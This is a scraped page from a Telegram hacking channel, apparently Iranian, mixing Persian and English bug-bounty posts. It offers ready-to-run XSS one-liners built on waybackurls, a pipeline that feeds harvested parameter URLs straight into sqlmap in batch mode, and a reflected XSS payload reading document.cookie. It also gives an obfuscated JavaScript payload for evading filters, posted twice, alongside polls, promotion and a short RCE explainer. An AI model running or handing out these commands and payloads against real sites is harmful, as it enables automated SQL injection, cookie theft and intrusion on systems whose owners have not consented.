Eʀᴏ ··ʜᴀᴄᴋ··
4.83K subscribers
65 photos
27 videos
10 files
105 links
🗡 A blackish gray hat hacker 🗡

🎯 Bug Bounty | Ethical Hacking | Web Exploits
📚 Tips, Writeups, Tools & Real Reports

Admin: @GoRunEro
加入频道
😠یه سرچ انجین جالب که میتونین توش مثل گوگل رایت اپ ها و پیلود ها و .... رو پیدا کنید

Link

#writeup
——————‌
@EroHack
☝️Boost
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯95👍3🔥1
👺xss oneliner command

echo "testphp.vulnweb.com" | waybackurls | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|icon|pdf|svg|txt|js)" | urldedupe -s | grep -IE "[?].*[&]?" | grep "=" | unew -p | pvreplace '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' | xsschecker -match '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' -vuln


⬇️ Download ( Tools )
🔒 BugCod3 ( ZIP )

#XSS #BugBounty

🌐@EroHack
➡️Boost
Please open Telegram to view this post
VIEW IN TELEGRAM
8👍3
SQLMap from Waybackurls ⚰️

waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"


#sql #sql_injection
——————‌
➡️@EroHack0
🙏Boost
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6🗿3🤯21
☠️Parameter: invitedby=

Payload=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


Full_url= https://site. com/?invitedby=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


#XSS #BugBounty

❤️@EroHack
✔️Boost
Please open Telegram to view this post
VIEW IN TELEGRAM
7🤯4
🔥XSS Tip:
If alert() is being converted to ALERT() and you can use
Like onerror=
"𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(𐂃)')()"


🧘‍♀️@EroHack
⚡️Boost
👍9🗿21
خیلی کوتاه یه نکته بگم که احتمالاً ۹۰ درصدتون نمیدونستید

- اگر اشتباهی به جای Shutdown دستتون خورد روی Restart و نمی‌خواستید منتظر بمونید تا سیستمتون ری‌استارت بشه کافیه زمانی که صفحه ری‌استارت اومده بود دکمه Esc رو بزنید تا ازش خارج بشید ؛)
🤯5👍3🔥21
🔖Backup Files Finder

A Nuclei template that allows you to search for backup files on your target's website.


😴Github: 🔗Link

#BugBounty #BugBountyTools
🔹 Share & Support Us 🔹
✔️ @EroHack
✔️Boost
👍6🤯2
🔥XSS Tip:
If alert() is being converted to ALERT() and you can use
Like onerror=
"𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(𐂃)')()"


🧘‍♀️@EroHack
⚡️Boost
👍7🔥1🤯1
ری اکشن بزار ببینم که میخوایم قوی شروع کنیم این مدت نبودیم😎
👍6👎1🔥1
Eʀᴏ ··ʜᴀᴄᴋ·· pinned «ری اکشن بزار ببینم که میخوایم قوی شروع کنیم این مدت نبودیم😎»
Eʀᴏ ··ʜᴀᴄᴋ··
یه حمایتمون نشه🥲❤️🫶🏻 https://yangx.top/boost/EroHack0
و تنها در خواستی که دارم از شما کسایی که پریمیوم دارن چنل رو بوست کنن، ماهم از خجالتتون در میام🫶🏻
🔥4🗿21
⚠️To reach the area you want to reach, do three things:
1-Creativity
2- Risk tolerance
3-Doing

♻️Read the tweet now. Click here to see the tweet.
👍4🔥3
اینجا کسی هست دوره تست نفوذ به سایت(وب هکینگ) کوروش رو شرکت کرده باشه؟
Anonymous Poll
26%
+
74%
-
🤣6🗿4👎31
اون دسته از دوستانی که داخل دوره شرکت کردن راضی بودن؟ (وب‌هکینگ کوروش)
Anonymous Poll
31%
+
69%
-
👎10🗿5🤣2👍1
Please open Telegram to view this post
VIEW IN TELEGRAM
8🤯2👎1🗿1
باگ rce چیست؟

آسیب پذیری Remote Code execution و یا به اختصار RCE یک نوع آسیب پذیری ریموت میباشد .
که به نفوذ گر امکان اجرای دستور دلخواه او را میدهد ، این آسیب پذیری بر اساس یک اشکال برنامه نویسی صورت میگیرد .
در هنگام استفاده از تابع Get در PHP اگر مقدار دریافتی را به درستی تعریف نکنیم با این آسیب پذیری مواجع میشویم . این مقدار میتواند بصورت یک متغیر در برنامه ما باشد . که در صورت بروز مشکل ما میتوانیم یک مقدار بصورت دلخواه به آن وارد کنیم به
تابع set را برای دادن مقدار به متغیرها در برنامه ها و تابع get را برای گرفتن مقدار متغیر ها و نمایش آنها در برنامه ها استفاده میکنیم.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5💯4🔥3
🔥 ‌ ‌ ‌ ‌ری‌اکشن فراموش نشه‌ ‌ ‌ ‌🔝
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5👍21
This media is not supported in your browser
VIEW IN TELEGRAM
بدون شرح...

دیس ایز کیبورد🤡
Please open Telegram to view this post
VIEW IN TELEGRAM
🤣7🗿3
⭕️ساعانی پیش متاسفانه گروه هکری irleak خبر از هک برنامه اتاقک داده.⭕️
🔹🔹🔹🔹🔹🔹🔹🔹🔹🔹🔹🔹🔹
بیزینس اتاقک
اجاره ویلا و هتل و ... بوده است.

🐦Twitter
💧Boost
Please open Telegram to view this post
VIEW IN TELEGRAM
🤣4🗿4🔥2